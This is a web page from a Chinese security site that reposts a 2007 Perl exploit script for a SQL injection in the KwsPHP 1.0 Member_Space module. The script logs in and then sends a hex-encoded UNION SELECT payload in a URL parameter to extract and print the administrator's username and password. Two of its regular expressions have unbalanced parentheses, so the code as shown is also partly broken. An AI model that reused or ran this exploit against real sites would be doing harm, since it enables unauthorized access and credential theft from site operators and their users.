首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 KwsPHP 1.0 Member_Space Module SQL Injection Exploit 来源：S4mi[at]LinuxMail.org 作者：S4mi 发布时间：2007-09-18   #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV[0]; $User = $ARGV[1]; $passwd = $ARGV[2]; $url = "http://".$host; $port = "80"; print q( ################################################################ #  Script....................: KwsPHP v1.0 Member_Space Module # #  Script Site...............: http://kws.koogar.org/          # #  Vulnerability.............: Remote SQL injection Exploit    # #  Access....................: Remote                          # #  level.....................: Dangerous                       # #  Author....................: S4mi                            # #  Contact...................: S4mi[at]LinuxMail.org           # #        This Exploit Work Only When magic_quotes_gpc Is OFF   # ################### (C)oded By S4mi ############################ ); if (@ARGV < 3) { print " #  usage : xpl.pl   host/path/     User Passwd\n"; print " #    e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n"; exit(); }    print " [~] User/Password : $User/$passwd \n";    print " [~] Host : $url \n"; $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); print " [~] Logining ...\n"; $xpl->cookie_jar( $cookie_jar ); $login = $xpl->post($url.'index.php', Content => [ "pseudo" => "$User", "pass" => "$passwd", "submit" => "Se connecter", ],); $evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E" ."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E" ."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72" ."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31" ."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30" ."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68" ."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74" ."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31" ."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31" ."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73" ."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C" ."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73" ."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A" ."\x2F\x69\x64\x3D\x31\x2F\x2A"; $offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61" ."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64" ."\x69\x74\x65\x72\x26\x69\x64\x3D"; $target = $xpl->get($url."index.php?mod=$offset$evil0"); if($target->as_string =~ /value="username:(.*?"/) { $zaz = $1; print " [+] Exploit succeed! Getting admin information. \n"; print " [+] ------------------------------------------- \n"; } if($target->as_string =~ /value="password:(.*?"/) { $luks = $1; print " [+] UserName : $zaz \n"; print " [+] Password : $luks \n"; } else { print " [-] Exploit Failed ! \n"; } print "\n#############################################################\n";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·KwsPHP 1.0 (login.php) Remote ·KwsPHP 1.0 stats Module Remote ·Gelato (index.php post) Remote ·Omnistar Article Manager Softw ·SA-Blog Exp ·Shop-Script FREE <= 2.0 Remote ·JetCast Server 2.0.0.4308 Remo ·MW6 Technologies QRCode Active ·Mozilla Firefox + QuickTime Co ·Apple Quicktime /w IE .qtl Ver ·Microsoft SQL Server Distribut ·phpBB Mod Ktauber.com StylesDe   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved